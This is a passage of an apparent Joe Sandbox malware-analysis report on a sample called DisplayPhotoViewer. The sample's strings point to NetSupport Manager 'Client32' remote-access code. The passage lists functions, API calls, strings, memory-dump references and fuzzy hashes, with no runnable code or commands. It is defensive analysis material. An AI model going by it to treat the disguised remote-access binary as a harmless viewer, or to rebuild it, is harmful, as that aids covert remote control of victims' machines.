                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F122
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                    • String ID: string too long
                                                                                                    • API String ID: 963545896-2556327735
                                                                                                    • Opcode ID: ee16adecf0ed86ee3df3cbd033626aab0d635550fd6cfd53a7d87e4a1e2af632
                                                                                                    • Instruction ID: f58b2536db4c159b7ed347375ee20bd11c30ee31e271539849f84125926f46c7
                                                                                                    • Opcode Fuzzy Hash: ee16adecf0ed86ee3df3cbd033626aab0d635550fd6cfd53a7d87e4a1e2af632
                                                                                                    • Instruction Fuzzy Hash: F111B433B046109BE321D95CEC80BAAF7E9EF966A4F10065FE591C7640C7A1A84187A1
                                                                                                    Function 110475C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • inet_addr.WSOCK32(00000000,0000003E,?,?), ref: 11047681
                                                                                                    • _free.LIBCMT ref: 11047689
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _freeinet_addr
                                                                                                    • String ID: >
                                                                                                    • API String ID: 1695503834-325317158
                                                                                                    • Opcode ID: f568d869cf56ea29797458e09ecb7740ead1ed93713d9dc728f378f4dc7ac882
                                                                                                    • Instruction ID: e0479d4dbd136a4935142e5dfe52e8d7b3a0764efc1b706737521cdb5fa979e8
                                                                                                    • Opcode Fuzzy Hash: f568d869cf56ea29797458e09ecb7740ead1ed93713d9dc728f378f4dc7ac882
                                                                                                    • Instruction Fuzzy Hash: A521F83490029A8BDF51DF28D8907D9BBF4BF1A314F5484D9D8C8DB240DE746A89CB91
                                                                                                    Function 1113B0A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1113B106
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2034136378-336475711
                                                                                                    • Opcode ID: 025e9d8b7c2ed8b01bc609cb237fe0bce46ce9ebd149069fcc55acabb56eb9fd
                                                                                                    • Instruction ID: 3f8abd3a4ec78c37b806f34597079abfa84fb652f6cbf0d32b039f3802d71a17
                                                                                                    • Opcode Fuzzy Hash: 025e9d8b7c2ed8b01bc609cb237fe0bce46ce9ebd149069fcc55acabb56eb9fd
                                                                                                    • Instruction Fuzzy Hash: C3217974D143599BDB11CF28DC08BDEF7386F41319F0081D8E99857146EE70A788CBA5
                                                                                                    Function 11069610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11069625
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • _memmove.LIBCMT ref: 11069654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                    • String ID: vector<T> too long
                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                    • Opcode ID: d14d9f654bd176e3258a20aa7c8b0f0a5233e49623bed6b38952cea943141831
                                                                                                    • Instruction ID: 373cc66ba54ed6a5cbbf578e480f595bb7eaea5d31e9e73511e5f861785f7ae6
                                                                                                    • Opcode Fuzzy Hash: d14d9f654bd176e3258a20aa7c8b0f0a5233e49623bed6b38952cea943141831
                                                                                                    • Instruction Fuzzy Hash: 210175B5A006069FC724CFADDC80CA7B7DDEBD43147158A2DE55687644EA70F904C7A0
                                                                                                    Function 11151370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11151385
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • _memmove.LIBCMT ref: 111513B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                    • String ID: vector<T> too long
                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                    • Opcode ID: c3f01f3dac44fab3be25d641e116f09001d0b13cd684952098fd95ec850e1ad5
                                                                                                    • Instruction ID: 793306a1184a9691caea2f9fdb19e15829fa54a7daf16724ffde3244be08563e
                                                                                                    • Opcode Fuzzy Hash: c3f01f3dac44fab3be25d641e116f09001d0b13cd684952098fd95ec850e1ad5
                                                                                                    • Instruction Fuzzy Hash: C201B5B16006069FC794CEADDCC0C6BF7E9EF853183108A2DE466C3644DA30F800C790
                                                                                                    Function 111032E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(?), ref: 11103310
                                                                                                    • SendMessageA.USER32(?,0000004A,?,?), ref: 1110332B
                                                                                                    Strings
                                                                                                    • Command %d not sent to player, xrefs: 1110334C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow
                                                                                                    • String ID: Command %d not sent to player
                                                                                                    • API String ID: 701072176-1782338917
                                                                                                    • Opcode ID: 683c1b2571ce18912babb890ca3dafcda8032549e213573af398045f3e798f32
                                                                                                    • Instruction ID: 6102d0bd59fb54a95c25518d1134f763b0e8a8bec9ce6c694c66fac6f498f300
                                                                                                    • Opcode Fuzzy Hash: 683c1b2571ce18912babb890ca3dafcda8032549e213573af398045f3e798f32
                                                                                                    • Instruction Fuzzy Hash: 570175B5E54618AFCB10DF64A8449EEFBF8DB58314F00C16BED04D7340EA71A910CB90
                                                                                                    Function 1100B4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Error. NULL capbuf, xrefs: 1100B4F1
                                                                                                    • Error. preventing capbuf overflow, xrefs: 1100B516
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                    • API String ID: 0-3856134272
                                                                                                    • Opcode ID: 85f63e2d8632ab4c1edf8dcf67a9d3e8f756e71d6ca8eb3f7d6b8552f1d4d10a
                                                                                                    • Instruction ID: 76f2803eb917654a7d1380e0bd805bb28217c377c279ab5a499153d0f8d1dfdf
                                                                                                    • Opcode Fuzzy Hash: 85f63e2d8632ab4c1edf8dcf67a9d3e8f756e71d6ca8eb3f7d6b8552f1d4d10a
                                                                                                    • Instruction Fuzzy Hash: 2301A7BAA00A0597DA11DF55F840BDBB3A8DBC037AF04847AEA1E97201D171B59586A2
                                                                                                    Function 110C9870 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __strdup
                                                                                                    • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                    • API String ID: 838363481-1175285396
                                                                                                    • Opcode ID: 83efbe4e5c5a1f05572d8f6e82dcb36550eaa7eefec802349a5589068770bd09
                                                                                                    • Instruction ID: caa2a38f234b78d4e9e419c0afb936ff098d7ad716dd6d423b096c1bbe6f9cce
                                                                                                    • Opcode Fuzzy Hash: 83efbe4e5c5a1f05572d8f6e82dcb36550eaa7eefec802349a5589068770bd09
                                                                                                    • Instruction Fuzzy Hash: 84F02876E003169BC701DE29EC00B9BFBD98F91A68F0880BAE898D7201F531A408CBD1
                                                                                                    Function 11147880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(D8458D00,?,110B9B01,?,?,00000000,?,?,?,00000000,1117A940), ref: 1114789C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DestroyWindow
                                                                                                    • String ID: !IsInit()$..\CTL32\WBObject.cpp
                                                                                                    • API String ID: 3375834691-1730213196
                                                                                                    • Opcode ID: 855691944fef47189312d09428b23cb90d211ce78293a9fd12d68452bbaad9b9
                                                                                                    • Instruction ID: 92f6ad26c654526d4a61039a016ecce4be460d543f8edc6109622c0acef19d65
                                                                                                    • Opcode Fuzzy Hash: 855691944fef47189312d09428b23cb90d211ce78293a9fd12d68452bbaad9b9
                                                                                                    • Instruction Fuzzy Hash: 8BF04978A01B028BFB14DF61D954B67BBE4AF80F08F15881CE45A8BE90D7B5E444CBA0
                                                                                                    Function 1101B970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101B984
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1101B9A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLastProc
                                                                                                    • String ID: FlashWindowEx
                                                                                                    • API String ID: 199729137-2859592226
                                                                                                    • Opcode ID: 4bf2e561018a0c7d0478fe1e3b0a3f2c437b58e8579c972f02846cc5d4d4c355
                                                                                                    • Instruction ID: 8b4a02ea4a73885b414a6a3535c51dec85437987b9d7171230d9fdef9ace903f
                                                                                                    • Opcode Fuzzy Hash: 4bf2e561018a0c7d0478fe1e3b0a3f2c437b58e8579c972f02846cc5d4d4c355
                                                                                                    • Instruction Fuzzy Hash: FCE01272A446345FC320EFADD884B86F7E89F14765F00442AEA8597544D675E840CBA0
                                                                                                    Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001091
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2046328329-1557312927
                                                                                                    • Opcode ID: e8248cd6bcb48f466a8afd90c449b233c883adf6989ca0a1181bc4465fe60b0b
                                                                                                    • Instruction ID: 64ed91d8d40fa0720119f1e29ddcedc02e8628b54c129b600307ea3e29a189fb
                                                                                                    • Opcode Fuzzy Hash: e8248cd6bcb48f466a8afd90c449b233c883adf6989ca0a1181bc4465fe60b0b
                                                                                                    • Instruction Fuzzy Hash: 39E01AB6610229BFD714CE99EC40ED773ADAB88354F008419F95997280D6B0E8508BA1
                                                                                                    Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001051
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
